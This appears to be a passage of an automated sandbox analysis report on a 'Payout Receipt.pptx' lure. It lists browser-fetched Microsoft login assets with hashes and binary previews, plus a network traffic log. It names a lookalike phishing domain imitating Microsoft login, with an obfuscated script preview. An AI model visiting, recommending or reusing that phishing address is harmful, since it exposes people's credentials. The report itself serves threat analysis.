                                                                                                                              Preview:...........k[.H.(.}..[..-..c.0DFxHBz.I......O.a...#yt......k...J..&...........^.~...._..j...W;.8<.....]....m...~.}<.8~s.~=.(....qm.Oy.~....jaP......h.F^......|oZ.G.M-...,...a..~..GW|...L....N.(y...Z-..Cm......p.......?.5/.QmS..b^K...jw..8.}..Q.....!.o..8...&X.x-.Im.F.D..U;.....-.T.:...1........8Ka..M.L.ZZ'....>........x....v.S;.<...0J.I.0.G.....B.F..c.k.~....C.:...r..,.w.q~....q......#42V.q..f|.kK...1o.mP.}.......N..n.w6.%^M.d.;...~2I.Z..fs...S/......F..=?...5....s..N.+.A.mx...j.T......?..W._p6.|.}|.{O.....2..`..._......g....j..xb^^...a.y.....s......4....q.Y..^T....X,.....m..~v,.....WP.U...:O".YoRX...7..S...zI.v.......mq.....E.,z.%....L|.>.M.'i..ki3.u+.~...x.=...?6.%?.[.G.`Z=.$.w..4.."...R.1.k.|..N.`......3...7.].'.E..).az......<a....4q..6.(..=~..........frk..?M#^Q.z..A..M.f.......S....s..d.e91._,zO.[X.......4.G..!.9Vg.......j.-?~.z.w..f.M............,...Z....w5..#.^..M.P.'.X.n/..mW.|......0...w../...>\...l.......h...q>.w...FC[....7.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):1435
                                                                                                                              Entropy (8bit):7.8613342322590265
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:GIF image data, version 89a, 352 x 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2672
                                                                                                                              Entropy (8bit):6.640973516071413
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                              MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                              SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                              SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                              SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                              Malicious:false
                                                                                                                              Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57443
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):16326
                                                                                                                              Entropy (8bit):7.987374325584103
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:GTwafLJjHlgnek9V15z6Brrwb9tYt3skOUAQC1:GTtTJjHlgneqTz658ht/eAQw
                                                                                                                              MD5:C217AE35B8592DC9F1E680487DAD094F
                                                                                                                              SHA1:2E642562C2BFD8968629317FF212684C7EB59193
                                                                                                                              SHA-256:D41992E79D7BCFCC1F32597208DD99033D99C04882EAFCC8508F2FA0EE728C6B
                                                                                                                              SHA-512:EAF3BF49BCF58A7F7C39CBF35FD75862FEE98F611536080DFC794D288274CB9D67E95D0299679F7981E110B2577A47579D3623C7F11A6AC2A0CFA56AAEA2CAB0
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js
                                                                                                                              Preview:...........}Ms#.......\.@..'F.........C)$....`.......Q.x7...}..'.}..?e#...QU]....Vo.................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.>............4....F,&c.)n.[.pcQp...4...6...i.............CkL=....'.\..L......2.A..o.u..."*p.. Xx.......'l.[w..'c/^.FP.....q.h4.R+X.x...d..M.}.Z,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j.7.....?.)..t.z.-..m.]..3y...3@.3YO.KSz]...4.b........V..+.%.[.&........l.H>G.^<..{.$"..-.i.........`qcw...`.[....as[.+.X...n..X..%,:......am."a....^o@@.`].....( (b...k..B.0.....AX.D.?...,..-<@k.;..(*..C.]...:.nn..8..s...."4.. ...J...P.n....F.3G..u..;9&.{.2.80.XB.....@.qw.:../.`.P?.+t..w6.a~..7...8k..U._......k,..o.....yQ..r.....}.E...B.r......?{...\fB....-.).Fb.;.p.N?(..P.?..p....F........)p..,`l...o@.;.x.....:..f.E....<0..#K\...K(?K/OX
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):673
                                                                                                                              Entropy (8bit):7.6596900876595075
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:GIF image data, version 89a, 352 x 3
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):3620
                                                                                                                              Entropy (8bit):6.867828878374734
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                              MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                              SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                              SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                              SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                              Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 69 x 28, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):4.002585360278503
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPl2tJTl1xl/k4E08up:6v/lhP4l17Tp
                                                                                                                              MD5:12C3C69752ACCA8E57AD40AFE9995284
                                                                                                                              SHA1:4A455F3A28234D424762CCBC42082AC75365AE53
                                                                                                                              SHA-256:FB4998D9FEC91AECF09537CE12DB40C1B1DFCC516BA96456D957DB7448732256
                                                                                                                              SHA-512:D9F6576FD2472081572A998449BAC2E7814769E5FF8498F99328383433F2774AF5A547907DC05B75C130586A6A6EEB53933FAE5A98C59780DE1606C8790E142E
                                                                                                                              Malicious:false
                                                                                                                              Preview:.PNG........IHDR...E..........n.A....IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 141866
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):49804
                                                                                                                              Entropy (8bit):7.994672288751266
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:1536:SMuttwJ0uUmAcZjNL6nnQlL+mwKLiQC7Mn3dxPErr:SwJ0vmAcKnnQF+8LJOMn3DPE/
                                                                                                                              MD5:6DE768A4DF1E0D0061CDB52EF06346C4
                                                                                                                              SHA1:3829A667B97668008023DDA98F4C0772174C8EF6
                                                                                                                              SHA-256:58732EEE2ED9091F4F5776DC8A8A14116CBE5A2BA1CCDA0256896BAB08A52128
                                                                                                                              SHA-512:CC6966D2C2B43E762750102E734DA6B88D7BFB92DDB5D482EE25029337D95E997466E83001586F2B63DAEE890B5F3188E8EC0F1B084D5EB67CFEA55EDDFAD47D
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_JQnUxWSvwsd9FrpspQmznw2.js
                                                                                                                              Preview:...........m[.8.0........OL....;w..nf.0.ff.X.'V......4.r~........=........,..JU.......T~.l..?..E.....X..|t~P9...TN..G..?^.~.............Xx.0..Q..Fa4.#7.q...F.;......4...Q.W&~.@....O.*T.y.37J.+Ggf...P....Pz.N...>..a.D..<.m./A,*...Q.....WN.Q...8.Db$.G.H<...'....J,..8..{nG.2@HYkL../......=.pL....A?.&Ng.i,......2lo...$.<.3...?~pW..=...L..&x.QR.u3..#6q2....U.Y1..".M. .<W."7@......w..."H,@......0..P....p:...[...E].A..%..V.K\.......F.ir.}.Lc{s..O.g..(|.........9o..A.t.K....Wv.l6..T.......t.........+..........-w {l..g...V..\=W.j.oaT}t.J`E..$W......;.k.\.t.w~}".....jf..W..."..a..0y........@.T.1.G0.......*.Y_....../..........@.....*]+.*..*.q\.cR.....t.3S-5g....'U.j.d......y.n,:).|.?.FW...d...|.......*.`.3....kMKf...#..,DM.TY+..g.........e+.>...{y..N/..g-#FV.V.p.......Xs.(..{..}..-.O..H=."...........8M.g..!H..0.~.Tdf.;...$D%N .)..!..V...'r\.... ...&....J|."Nd%D:uw:.<W.+...H&.Z...L=..U.v....J.t.0%+...U..3M....y...L..G...p='.....pB"-..|.....j .a".i=O.R Q2..."...
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1840x630, components 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39755
                                                                                                                              Entropy (8bit):7.574348657479085
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:LYU5cIupDSkdi0l48StkLA1bAjtenAB7MGrv+/:TruJSkwIlDMBAjtenAB7xrW/
                                                                                                                              MD5:3972435031D02D6FF6CB8A5F2A786094
                                                                                                                              SHA1:0AE6D027CD444F4C4605B21486E919C310FD92D3
                                                                                                                              SHA-256:BA7E54CBF5CA0A4BBDAA39254C20EB8490ADBBA42CD0A14B5B0001A6AA51A26D
                                                                                                                              SHA-512:18BC5D61EC062605ADDB6B06FBA90283E24CA3D6D3333D3803EFCFCFEA100899AF23A5E21649BD0EE751001CF7402508D0817CB570D0243A0BBE4C40657B11BE
                                                                                                                              Malicious:false
                                                                                                                              Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................v.0..".................................................................................@............................................................................................?+7r..O3q.3w.!..'..s......].v.7..^.qxQ..Z....@y.>.Y.O...4..|9.p.~.h..m..\.x.........?..i._.h.....YU.!...........................................................H...G....,5.....U..+.C....l..,...`A.z.V},..[.......;MX.e".D..I....[..y...kGYl..2...>..Ec?.hf...+.........Z..1..C3..fw.....5.c..[...............................................................".".-.+.....2.[i7jN4.........l.N......Y..........O...k.ff..+.g..5..9...........*IH.<.u.....c.[.vm..........#..;..>.X.}.:..Q.zI[.Q.R.A..rV...?...........................................................r.q......Xk..u....'.W.......T..'......L.......T|.6..R+y.....\.Q.l...d.....d|>....
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):673
                                                                                                                              Entropy (8bit):7.6596900876595075
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                              Malicious:false
                                                                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):17174
                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                              Malicious:false
                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (8053), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):8053
                                                                                                                              Entropy (8bit):5.773897399401492
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:7vDk5F+L7w9ZfMLnGhvUg1lp97+jh1CidK/9y8bh:TA8gfMLGhvUg1j0h1DdK/99bh
                                                                                                                              MD5:AC4486E6D5EBA10EB0D1D0959934C24A
                                                                                                                              SHA1:F395C93330C0AA5699314C28A0EDFF529D77B9DA
                                                                                                                              SHA-256:06D82B97CF558B34C96574EABC06D67D31887FF3E4C1F13AFF0456B4A7CFB17E
                                                                                                                              SHA-512:8A247B5BAB0684BC27D43E0EC336196C3E88B9690D5965A948A3C444BD287D139C7D94D395385527BDA7ECF809F1617490A8CBB8BF09AD75DB0689C0944622A6
                                                                                                                              Malicious:false
                                                                                                                              URL:https://l0gin-microso.ftlivedocs.tech/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
                                                                                                                              Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,f,g,l,m,v,x,z){V=b,function(c,d,U,B,C){for(U=b,B=c();!![];)try{if(C=-parseInt(U(237))/1+-parseInt(U(248))/2+-parseInt(U(327))/3*(parseInt(U(306))/4)+-parseInt(U(329))/5*(parseInt(U(260))/6)+parseInt(U(231))/7*(parseInt(U(253))/8)+-parseInt(U(242))/9*(-parseInt(U(258))/10)+-parseInt(U(236))/11*(-parseInt(U(259))/12),d===C)break;else B.push(B.shift())}catch(D){B.push(B.shift())}}(a,990903),f=this||self,g=f[V(222)],l={},l[V(225)]='o',l[V(228)]='s',l[V(281)]='u',l[V(263)]='z',l[V(247)]='n',l[V(293)]='I',m=l,f[V(254)]=function(B,C,D,E,a4,G,H,I,J,K,L){if(a4=V,C===null||void 0===C)return E;for(G=s(C),B[a4(311)][a4(274)]&&(G=G[a4(250)](B[a4(311)][a4(274)](C))),G=B[a4(291)][a4(315)]&&B[a4(289)]?B[a4(291)][a4(315)](new B[(a4(289))](G)):function(M,a5,N){for(a5=a4,M[a5(324)](),N=0;N<M[a5(283)];M[N+1]===M[N]?M[a5(266)](N+1,1):N+=1);return M}(G),H='nAsAaAb'.split('A'),H=H[a4(256)][a4(287)](H),I=0;I<G[a4(283)];J=G[I],K=o(B,C,J),H(K)?(L='s'===K&&!B[a4(270)](C
                                                                                                                              File type:Microsoft PowerPoint 2007+
                                                                                                                              Entropy (8bit):7.978439598376639
                                                                                                                              TrID:
                                                                                                                              • PowerPoint Microsoft Office Open XML Format document (133004/1) 76.65%
                                                                                                                              • Microsoft PowerPoint Macro-enabled Open XML add-in (32504/1) 18.73%
                                                                                                                              • ZIP compressed archive (8000/1) 4.61%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:Payout Receipt.pptx
                                                                                                                              File size:210'853 bytes
                                                                                                                              MD5:1417101d84f9b072a9d27567e41b12eb
                                                                                                                              SHA1:d4ad5741fd589701af1c8270cfedeced334c0956
                                                                                                                              SHA256:12dda16106f761f8d7508f450b212e3eefdbef67e97ff74afde7ac94ba704498
                                                                                                                              SHA512:64ce5f8c224cd8388876ed9027a515f0e5e60dc10efc0c7b730d2e0d2c83119c4a4a0c8aaa34e9c44895b9d5ae46ff1f494131912f9cd46402c9c30faf43256b
                                                                                                                              SSDEEP:3072:lEhMf8S02zjwwvQj3MTokJuEulCGZquL2tIueTNXsFmnnPqguXABcuQwtdoB:59Jzjwwv18muS4q/aCtX0QKdW
                                                                                                                              TLSH:2C240259FE034211D27356B1D13CE59490B9CDA2A44BF989FAF676C20219C910B8FBEB
                                                                                                                              File Content Preview:PK............................[Content_Types].xml...n.:....8. p.X..6M..Y...%@..`....7p.....h.Q..Jj..F.......x.^...k...........J.E...~.]..I8%.wP.. ......v.......[.....\..X....f..........)........#p4.F....a.V...5......`..m...b.6...w.....<...`. E.`.....k..j.
                                                                                                                              Icon Hash:3de58c8eaea685b5
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 4, 2024 15:10:31.540602922 CEST49675443192.168.2.17204.79.197.203
                                                                                                                              Oct 4, 2024 15:10:31.844265938 CEST49675443192.168.2.17204.79.197.203
                                                                                                                              Oct 4, 2024 15:10:32.449234962 CEST49675443192.168.2.17204.79.197.203
                                                                                                                              Oct 4, 2024 15:10:33.656277895 CEST49675443192.168.2.17204.79.197.203
                                                                                                                              Oct 4, 2024 15:10:35.700581074 CEST49680443192.168.2.1720.189.173.13
                                                                                                                              Oct 4, 2024 15:10:36.004419088 CEST49680443192.168.2.1720.189.173.13
                                                                                                                              Oct 4, 2024 15:10:36.068203926 CEST49675443192.168.2.17204.79.197.203
                                                                                                                              Oct 4, 2024 15:10:36.462239027 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:36.462285995 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:36.462717056 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:36.465095043 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:36.465123892 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:36.608503103 CEST49680443192.168.2.1720.189.173.13
                                                                                                                              Oct 4, 2024 15:10:37.272658110 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.272901058 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.276858091 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.276871920 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.277184963 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.336215973 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.634975910 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.675405025 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.812814951 CEST49680443192.168.2.1720.189.173.13
                                                                                                                              Oct 4, 2024 15:10:37.906111002 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.906141996 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.906150103 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.906169891 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.906183958 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.906191111 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.906244993 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.906272888 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.906321049 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.906321049 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.906538010 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.907020092 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.907068968 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.907068968 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.946506977 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.946527004 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:37.946540117 CEST49704443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:10:37.946546078 CEST443497044.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:40.225235939 CEST49680443192.168.2.1720.189.173.13
                                                                                                                              Oct 4, 2024 15:10:40.871258974 CEST49675443192.168.2.17204.79.197.203
                                                                                                                              Oct 4, 2024 15:10:41.967226028 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:41.967279911 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:41.967372894 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:41.967698097 CEST49709443192.168.2.1713.107.246.60
                                                                                                                              Oct 4, 2024 15:10:41.967710972 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.620462894 CEST4434970913.107.246.60192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:42.620564938 CEST49709443192.168.2.1713.107.246.60
